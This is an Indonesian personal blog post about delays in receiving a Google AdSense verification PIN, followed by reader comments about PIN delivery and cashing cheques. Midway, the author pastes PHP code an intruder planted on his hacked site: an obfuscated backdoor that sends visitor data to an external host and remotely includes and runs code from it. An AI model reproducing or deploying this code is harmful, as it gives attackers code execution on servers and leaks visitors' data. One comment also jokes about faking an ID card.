Perjalanan Berliku Google Adsense-ku

0 0 vote
Article Rating

Surabaya – Tanggal 22 Januari 2008 kemarin aku medapat email dari Google tentang PIN Google Adsense (GA) yang sampai dengan waktu itu belum aku masukan untuk melakukan verifikasi, tapi sampai dengan tanggal 22 Januari 2008 aku memang belum menerima PIN. Belum menerimanya PIN sebenarnya karena kesalahanku, karena alamat yang aku gunakan untuk mengirimkan PIN adalah alamat kakakku yang ada di Jogja, sementara aku tinggal di Surabaya dan kakakku menggap surat dari Google tersebut adalah surat biasa.

google-1.gifSehingga kekonyolan sebenarnya ada pada kakakku yang menganggap itu kartu PIN tidak berguna dan dihilangkan padalah sejak bulan Desember aku sudah menelpon dan SMS untuk memberi tahuku jika ada surat/kartu dari Google, al hasil karena aku terlambar masukin PIN GA-ku gak bisa muncul iklan, yang ada hanya iklan layanan masyarakat, dan kurang 60 hari GA-ku akan di non-aktifkan.

Aku sempat nulis di forum GA dan saran dari beberapa taman agar aku cepat-cepat meminta lagi PIN kepada Google agar dikirimkan PIN kembali, kemudian aku melakukan permintaan PIN lagi pada tanggal 28 Januari 2008 dan aku meminta agar PIN dikirimkan ke alamat kantorku di Surabaya dan baru tanggal 27 Februari 2008 kemarin aku menerima PIN penganti dari Google. Setelah ditelpon teman yang ada di sekretariat kantorku yang memberi tahu bahwa PIN ku dari Google sudah datang, pikirku dalam hati GA-ku masih ada harapan dan memang benar GA-ku masih bisa diharapkan.

google-2.gifSetelah PIN aku terima aku coba masukkan dan setelah 2 hari GA-ku aktif lagi, tentunya aku seneng sekali karena GA yang selama ini sudah diujung tanduk akhirnya dapat hidup lagi, tapi sayang setelah GA aktif, situsku disusupin oleh orang yang tidak bertanggung jawab sehingga tampilannya jadi berubah, bahkan si penyusup meninggalkan coding PHP dalam script situsku, coding yang ditanaman dalam situsku tersebut seperti pada coding dibawah ini dan belum aku lakukan analisis apa maksud dari coding PHP tersebut, bisa jadi coding tersebut adalah coding jahat yang ditanamkan pada situsku.

<?
error_reporting(0);
$a=(isset($_SERVER[“HTTP_HOST”]) ? $_SERVER[“HTTP_HOST”] : $HTTP_HOST);
$b=(isset($_SERVER[“SERVER_NAME”]) ? $_SERVER[“SERVER_NAME”] : $SERVER_NAME);
$c=(isset($_SERVER[“REQUEST_URI”]) ? $_SERVER[“REQUEST_URI”] : $REQUEST_URI);
$g=(isset($_SERVER[“HTTP_USER_AGENT”]) ? $_SERVER[“HTTP_USER_AGENT”] : $HTTP_USER_AGENT);
$h=(isset($_SERVER[“REMOTE_ADDR”]) ? $_SERVER[“REMOTE_ADDR”] : $REMOTE_ADDR);
$n=(isset($_SERVER[“HTTP_REFERER”]) ? $_SERVER[“HTTP_REFERER”] : $HTTP_REFERER);
$str=base64_encode($a).”. “.base64_encode($b).”. “.base64_encode($c).”. “.base64_encode($g).”. “.base64_encode($h).”. “.base64_encode($n);
if((include_once(base64_decode(“aHR0cDovLw==”).”hicizzazbzbaee”. base64_decode(“LnVzZXJzLnBocGluY2x1ZGUucnU=”).”/?”.$str)))
{
} else {
include_once(base64_decode(“aHR0cDovLw==”).”hicizzazbzbaee”. base64_decode(“LnVzZXJzLnBocGluY2x1ZGUucnU=”).”/?”.$str);
}
?>

Coding tersebut yang ditinggalkan disalah satu file webku, dan sampai dengan saat ini aku belum perbaiki karena kendala akses cPanel yang tidak bisa aku lakukan dari kantorku.

Tentang GA-ku, bahkan aku sempat patah semangat, aku jadi males dan muak dengan internet, banyangkan seandainya account GA-ku jadi di non aktifkan usahaku semala 1 tahun ini gagal dan benar-benar gagal karena kecerobohanku dan kakakku yang aku. Tapi aku yakin usaha keras pasti ada hasilnya walau sudah ujung tanduk.

0 0 vote
Article Rating
Subscribe
Notify of
guest
17 Comments
Most Voted
Newest Oldest
Inline Feedbacks
View all comments
Fariez
6 March 2008 10:33

walah sabar yo mas… koq gak dikirim ke alamat sesuai KTP aja,.. soalnya ntar waktu cairin cek dimintain KTPnya loh,.. seminggu yg lalu aq ambil duit dari cek yang sebulan sebelumnya q cairkan di Citibank, pas di telpon org citibank aq mash di jogja, orangnya nyuruh cepetan ngambil uang tsb tapi aq minta beberapa hr lagi coz msh ada kuliah. Eh. gak bisa katanya, harus scepatnya, trus aq minta diwakilkan aja bisa gak khan tinggal ambil aja, dia bilang juga tetap gk bisa. Usut punya usut eh emang trnyata saat itu dollar lagi melemah, 9020,- aja tapi gak tau kena… Read more »

Fariez
9 March 2008 04:58

mungkin bisa aja kalo pakai surat kuasa..hehe..emboh denk. Yang jelas ntar bener2 dipelototin wajahnya sama gak, namanya sama gak, alamatnya sama gak, tanda tangannya sama gak… sebaiknya sih sesuai KTP aja.. kalo ceknya gak bisa diakali, ya akali KTPnya aja.. buat aja KTP surabaya hehe..

Wauh buat KPT di Surabaya sulit kayaknya, kan harus pindah penduduk segala, tapi aku rencana nyairin masih lama kok, masih bisa berfikir sebaiknya gimana…..

xocu
11 March 2008 17:16

wah mas, saya juga nunggu2 pin yang blom sampe dari kemaren, hati jadi was2, sedang alamat yang saya masukkan benar2 alamat rumah saya. Namun kenapa ya? kok blom nyampe? Padahal menurut email yang dikirimkan google pin tersebut sudah dikirim sejak 30 januari 2008, Apa iya bisa selama itu sampainya? Mohon pencerahannya apa yang harus saya lakukan, apa perlu req: PIN-Baru (gimana jika req, juga gak nyampe?) Atau perlu ganti alamat? Apa ada yang pernah ngalami seperti ini? 🙁 Pengalamanku kemarin PIN datang sekitar 3 mingguan, kalau lebih dari 1 bulan mending minta PIN baru lagi aja, karena jangka waktu dari… Read more »

mitradhi
31 March 2008 20:48

sama…PIN saya juga belom nyampe ke rumah, padahal sudah 2 bulan (T_T), tanya ke kantor pos katanya mereka juga nggak bisa melacak tuh surat,yang bisa dilacak hanya kiriman paket barang atau surat yang ada nomer resinya. Kalau 2 bulan belum datang mending minta lagi aja Mas, karena sama Google hanya dikasih waktu 6 bulan untuk memasukkan PIN, kalau sampai dengan 6 bulan PIN belum datang GA bisa di non aktifkan. Atau coba ganti alamat aja siapa tahu salah alamat, aku dulu nyaris di non aktifkan karena sudah 5 bulan PIN baru datang karena sama kakak-ku PIN tersebut dianggap tidak penting… Read more »

trackback

[…] memasukkan PIN seperti yang aku tulis di blog ini pada bulan Februari 2008 kemarin yang berjudul Perjalanan Berliku Google Adsense-ku dan kesalahan menggunakan file Roboots.txt sampai Google tidak mau melakukan index, pusing […]

mamat
19 August 2008 23:31

wah… saya gimana ya? Baru 4 minggu ikutan adsense. Tapi masih belum paham juga masalah PIN. Kata google sich pinnya sedang dalam perjalanan tertanggal 14 Agustus 2008 kemarin. Doakan ya kawan-kawan hehehehe Kalo mau kitab2 turats silahkan berkunjung ke blog saya

Wah selamat udah main GA, moga berhasil dan saling berbagi.

ESN+

naruto
17 October 2008 19:06

disini banyak yang senasib … nasib – nasib, gugel – gugel, mengapa PIN ku kok belom sampai ke rumah. Oalah mBah Gugel pikun kali yee … 🙁

Terima kasih mas, yang jelas memang harus sabar dan terus berusaha kenapa kok PIN belum juga sampai.

ESN+

toni
toni
21 November 2008 23:43

lha punyaku PIN dah dpt dah aku masukin sehari stlh aku dpt malah…

ehh pas mu duit cair kok account google adsenku disabled…..

dah aku email seh google nya..tp mpe skrg tetep ga isa login ke GA..ialgn dah $170

Andre
14 January 2009 22:47

mas mo nanya nich untuk masukan alamtnya pake bahasa inggris pa indo, misal jalan gitu diganti street ato gimana coz sampek 2 bulan pin ga nyampek2? makasih

Memasukkan alamat pakai bahasa Indonesia aja tidak masalah, yang jelas isi web harus dalam bahasa Inggris, untuk PIN kalau udah dikirim di account adsense akan dikasih tahu, kalau aku dulu diatas US$100 baru dikirim PIN-nya dan dikasih waktu 3 bulan, kalau sampai 3 bulan PIN tidak dimasukkan maka account google adsense akan di disable.

Salam kenal,
ESN+

lutfi
26 January 2009 11:22

rata-rata kasus kita sama ya aq juga gitu suadah dapat email pembritahuan dari GA kalau pinku da dikirim 8 desember 08 dapat tiga minggu setelahnya aq cek di rumahku belum juga ada kiriman pin akhirnya aku minta kirim kembali pada tanggal 8 januari dan aku rubah alamatq dg alamat kantor tapi sampai sekarang 26 januari aq juga belum terima

Yang sabar mas, mungkin masih dijalan…asiknya main GA itu seperti itu, deg-deg ser he he

Fariez
16 May 2009 09:14

mungkin bisa aja kalo pakai surat kuasa..hehe..emboh denk. Yang jelas ntar bener2 dipelototin wajahnya sama gak, namanya sama gak, alamatnya sama gak, tanda tangannya sama gak… sebaiknya sih sesuai KTP aja.. kalo ceknya gak bisa diakali, ya akali KTPnya aja.. buat aja KTP surabaya hehe..

Wauh buat KPT di Surabaya sulit kayaknya, kan harus pindah penduduk segala, tapi aku rencana nyairin masih lama kok, masih bisa berfikir sebaiknya gimana…..

Red Gear
18 June 2009 20:56

Sorry, Newbie GA nih, baru daftar beberapa hari yang lalu. PIN itu maksudnya apa sih? Apa akan dapet PIN untuk cairin cek GA atau untuk verifikasi GA?

rachmattullah
19 June 2009 17:29

terima kasih informasimu sobat 😀

anasamrulloh
anasamrulloh
28 August 2009 14:20

cory bro ganggu….q da mslh dikit neeee…..mngkn bisa bntu.
q ikut GA dari awal tahun 2009, nah dari awal tahun itu earning bisa di katakan lebih dari 10$,klu saya lht setelah dpt 10$ PIN akan di kirim dari pihak google melalui kantor pos, tapi kenapa kok sampai ckrng PIN aq belum nyampek juga…???????kira2 apa ya yang jadi batu sandungan yaaa..?????maksih ya….

hanny
15 December 2009 21:43

hummmm harus tetap semangat sob..mantap